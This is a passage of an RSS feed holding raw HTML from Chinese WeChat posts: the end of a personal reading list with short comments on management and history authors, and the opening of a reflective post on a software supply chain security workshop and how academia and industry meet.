style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">IT</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">本源的。</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">刘伟光</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">全域数字观，文学性很强的技术作品。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">ITIL 4</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">数字化实践有点基础后，再读，除了赞叹还是赞叹！</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">彭凯平</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">君哥读博后推荐的，把flow翻译为福流（不推荐心流）。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">人文历史学者</span></p></td><td width="459" valign="top" style="width:485.15pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">秦晖、张鸣、杨奎松、罗新、王明珂、任剑涛、戴锦华、葛剑雄、易中天、葛兆光、吴思、张宏杰、赵鼎新、{王怡}；“历史是倾听无声处的声音”；史学研究对做大数据建模会有很多启发；</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">&#34;</span><span style="font-size:11.0pt;font-family:Microsoft YaHei UI;mso-ascii-font-family:Microsoft YaHei UI;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">老师好不好，学生都知道，没有人比学生更清楚</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">&#34;</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p></td></tr><tr><td width="93" valign="top" style="width:64.35pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">Jeff Sutherland</span></p></td><td width="459" valign="top" style="width:481.25pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">坚定的反“微观管理”，对体制无奈苦笑，精神矍铄、反应Scrum的老头。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">VSM</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">Helen Beal, Mik Kersten，值流管理。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">李智桦</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">有趣的敏捷布道者。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">乔锐</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">用绝对正宗的中国话和中国思想讲现代管理，代表作《拆解》。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">刘润</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">系统动力学。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">陈春花</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">“碎片化统合起来没有整体价值就是虚假繁忙！”听她话，我放弃了无效的虚假学习，静心看、听，而且要有笔记。</span></p></td></tr><tr><td width="93" valign="top" style="width:63.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">赵林</span></p></td><td width="459" valign="top" style="width:482.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">西方哲学史讲演录；也是补课。类似文学回忆录补了文学史的课。还是形成世界观的过程。</span></p></td></tr></tbody></table><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;">          <o:p> </o:p></span>    <o:page></o:page></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484022">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=d90545ff&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247484022%26idx%3D1%26sn%3D4542b0e27521bcbcb02070e49f95079d%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 23 Apr 2024 21:14:00 +0800</pubDate>
    </item>
    <item>
      <title>软件供应链安全: 学术洞见与产业方案的双向奔赴</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247484014&amp;idx=1&amp;sn=138ebb90548ecf62013dd32d25b8fe7a</link>
      <description>软件供应链安全，是学术界和工业界的共同热点，学术洞见与产业方案双向奔赴，有机会形成根技术和新质产品。</description>
      <content:encoded><![CDATA[<p>
<span>Reparo Totallum</span> <span>2024-03-29 07:08</span> <span style="display: inline-block;">上海</span>
</p>

<p>软件供应链安全，是学术界和工业界的共同热点，学术洞见与产业方案双向奔赴，有机会形成根技术和新质产品。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=4c53fd0d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINzpt1kePfzbn8tSCor7SICUTTDFZ9XuGF7fgEiaMuCjAkibNuticpPJKL9TnvaB61Luviata7pQ2xn45Q%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<h1 style="margin-right: 0cm;margin-left: 0cm;"><br/></h1><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size: 16px;white-space: normal;background-color: rgb(255, 255, 255);overflow-wrap: break-word !important;margin-bottom: 0px;"><section powered-by="xiumi.us" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section style="padding-right: 10px;padding-left: 10px;max-width: 100%;box-sizing: border-box;line-height: 1.6;word-wrap: break-word !important;"><section style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section powered-by="xiumi.us" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section style="padding-right: 30px;padding-left: 30px;max-width: 100%;box-sizing: border-box;line-height: 1.6;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;word-wrap: break-word !important;"><strong style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="max-width: 100%;color: rgb(136, 136, 136);font-size: 20px;box-sizing: border-box !important;word-wrap: break-word !important;">“</span></strong><span style="max-width: 100%;color: rgb(136, 136, 136);box-sizing: border-box !important;word-wrap: break-word !important;"> 软件供应链安全，是学术界和工业界的共同热点，学术洞见和产业方案双向奔赴，有机会形成根技术和新质产品。<strong style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="max-width: 100%;font-size: 20px;box-sizing: border-box !important;word-wrap: break-word !important;">”</span></strong></span></p></section></section></section></section><section style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section powered-by="xiumi.us" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section style="padding-right: 22px;padding-left: 22px;max-width: 100%;box-sizing: border-box;line-height: 1.6;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;word-wrap: break-word !important;"><br/></p></section></section></section></section></section></section></section></section><p><span style="color: rgb(20, 50, 77);font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 20px;letter-spacing: 0.034em;">前传：偶遇群星璀璨，开始追剧</span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2021年，我在B站ChinaSoft优秀</span><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">青年学者论坛，<span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">看到复旦大学陈碧欢老师的</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">软件供应链演讲</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，</span>后续在一个厂商交流群</span><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">满心欢喜加上他的微信。非常合拍的是，陈老师有很长一段时间，高频组织在线会议，大江南北、赤道两侧、东西半球、来自十多个顶尖名校的众多软件供应链学者，都出现在他组织的视频会议里面，我就幸福地</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">追剧、提问、催更</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。我当然是CodeWisdom的铁粉，不过直到3月12日在</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><a href="https://mp.weixin.qq.com/s?__biz=MzU4NDU4OTM4OQ==&amp;mid=2247508668&amp;idx=1&amp;sn=6653d631f449d790831d3fa100b9cd04&amp;scene=21#wechat_redirect" data-linktype="2">开源生态与软件供应链研讨会</a></span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，才现场见到陈老师真神和领军CodeWisdom的彭鑫教授本尊。研讨会内容很硬核，我整理一篇笔记，践行社区志愿者、知识搬运工职责。<o:p></o:p></span></span></p><h1 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);font-size: 20px;">感受：学术洞见与产业方案的双向奔赴</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);font-size: 14px;"><o:p></o:p></span></h1><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">CodeWisdom有期微访谈，有个工业界的嘉宾感慨，</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">学术界说的每一个坑，工业界都要踩一下</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。学术界的研究成果可以为产业界提供新的思路和技术基础，而产业界的需求和挑战也可以激发学术界的研究兴趣。</span></span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">学术界通常于深入研究问题的根源，更多进行新</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">理论探索、实验验证和基础研究，以解决更广泛、更深</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">层次的挑战，推动领域的发展。从学术到解决方案周期长，但可以为未来的创新提供基础。</span></p></li><li><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">工业界更注重实用性和解决当前问题，倾向于快速实施或定制可行的解决方案，以满足市场需求和业务目标，解决方案的有效性和商业可行性通常比技术的原理更受重视。</span></p></li></ul><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">这次研讨会也呈现了一个趋势，学术界和工业界的边界已经模糊，学术界的成果在工业界应用很广泛，工业界也和高校进行多层次的合作。<o:p></o:p></span></p><h1 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);font-size: 20px;">好奇：为什么积极参加学术活动？</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);font-size: 14px;"><o:p></o:p></span></h1><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">走出校园快20年了，为何还回头关注高校和学术圈？原因就是</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">第一性原理，溯源到本质问题，再去构建根本解</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，从我个人角度有两方面：</span></span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-right: 0cm;margin-left: 0cm;"><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;letter-spacing: 0.034em;">从源头校准问题定义及解法</span></p></li><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">学习并吸收学术界对所关注问题领域的术语规范、概念界定、理论构架。</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">要保持严谨，<span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">不去偷换概念、朦胧</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">实际问题</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">，戒</span>之慎之。</span></p></li><li><p 